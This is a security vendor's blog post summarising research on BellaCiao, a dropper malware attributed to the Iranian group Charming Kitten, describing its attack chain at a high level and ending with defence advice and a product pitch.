BellaCiao: The New Malware From Iran’s Charming Kitten

The Protest Coming From The Darkside

 

Bitdefender Labs has recently identified a new type of malware called BellaCiao. The malware is thought to have been created by Charming Kitten. This malicious software acts as a personalized dropper, which can deliver other payloads onto the targeted machine based on commands from servers controlled by cyber attackers. BellaCiao can spread through phishing emails, exploit kits and drive-by downloads. Once installed in a computer, it can steal sensitive data or cause severe damage by disrupting critical operations.

A dropper trojan is a malicious software that installs other kinds of malware—viruses or backdoors—onto an infected computer. The malware may be embedded within the dropper in a way that allows it to evade detection by antivirus software, or—alternatively—the dropper itself can download and install the code onto your computer upon activation. A dropper is malware specifically designed to infiltrate a computer system and then spread the virus by installing its components into the host.

BellaCiao has been designed to target specific victims, each sample being linked with a particular victim and containing hard-coded details like company name and associated public IP address. The attackers are apparently tailoring their attacks to each victim with malware binaries containing customized information such as company names and IP addresses. The presence of debugging information and file paths in the executable suggests that the attackers are organizing their victims by country code, such as IL (Israel), TR (Turkey), AT (Austria), IN (India), or IT (Italy).

BellaCiao acts as a dropper, delivering other malicious payloads onto the victim’s machine. The initial infection vector has yet to be determined by experts, although it’s suspected that the attackers exploited a software vulnerability or a Microsoft Exchange exploit.

Charming Kitten

 

Charming Kitten (or APT 42, Phosphorus, NewsBeef, Parastoo, Newscaster, Mint Sandstorm, and Ajax Security) is a highly active Iranian nation-state group since at least 2013 and has targeted numerous organizations in Europe, the Middle East, and the United States.

In late 2021 and early 2022, Microsoft revealed that the group associated with Iran’s Islamic Revolutionary Guard Corps (IRGC) was responsible for cyber attacks on U.S. critical infrastructure.

Kitten is known for using various techniques to target its victims, including spear phishing, targeted at specific individuals or organizations, watering hole attacks, and hacking into social media accounts. Charming Kitten has been linked to several high-profile attacks, including targeting the United Nations, the European Union, and the Saudi government. The group is also believed to have been involved in the 2016 U.S. presidential election.

Charming Kitten is a highly sophisticated group that is constantly evolving its tactics. The group is known for using a variety of malware, including custom-built backdoors and remote access tools. In addition, the group proves to be fiendishly adept at carrying out attacks on computer systems.

How Does Malware Work?

 

BellaCiao can exploit known vulnerabilities in internet-facing applications such as Zoho ManageEngine or Exchange Server to infect a victim’s system. Once inside the system, the malware periodically sends DNS requests to resolve a subdomain to an IP address. The IP address then provides the commands to execute on the compromised machine.

As part of the attack chain, the malware deploys a web shell, which a second variant of BellaCiao replaces with a Plink tool (a utility for PuTTY). This enables the malware to establish a reverse proxy connection to a remote server and deploy backdoor features.

To maintain a persistent presence on the infected system, BellaCiao attempts to disable Microsoft Defender using a PowerShell command and establish a service instance.

How to Protect Yourself?

 

To safeguard against modern attacks like BellaCiao, it’s crucial to adopt a defense-in-depth architecture, which entails deploying multiple security measures to defend against various threats. The first step in this approach is to minimize the attack surface.

Automated protection controls are vital in detecting and blocking most security incidents before they can cause any damage. Implementing IP, domain, and URL reputation is one of the most effective methods to thwart automated vulnerability exploits.For more information on the malware, including IoCs (Indicators of Compromise) and technical details, you can visit the Bitdefender website.

How Can Brandefense Help You?

 

Today, any service or technology running on a domain or IP address is quickly discovered when it becomes publicly accessible, and attacks begin almost immediately. With Brandefense’s attack surface discovery service, we effectively capture a snapshot of your attack surface and monitor its risks and developments.

By conducting regular scans, we identify potential vulnerabilities and communicate any concerns to our clients. This proactive approach ensures that your organization remains vigilant and responsive to potential threats, safeguarding your digital brand from would-be attackers and maintaining a strong security posture in an ever-evolving digital landscape.

Incorporating Brandefense into your all-encompassing cybersecurity strategy lets your organization stay ahead of ever-evolving digital threats. Through proactive monitoring and addressing potential risks, you can safeguard your valuable assets and maintain a robust security posture.

Share This: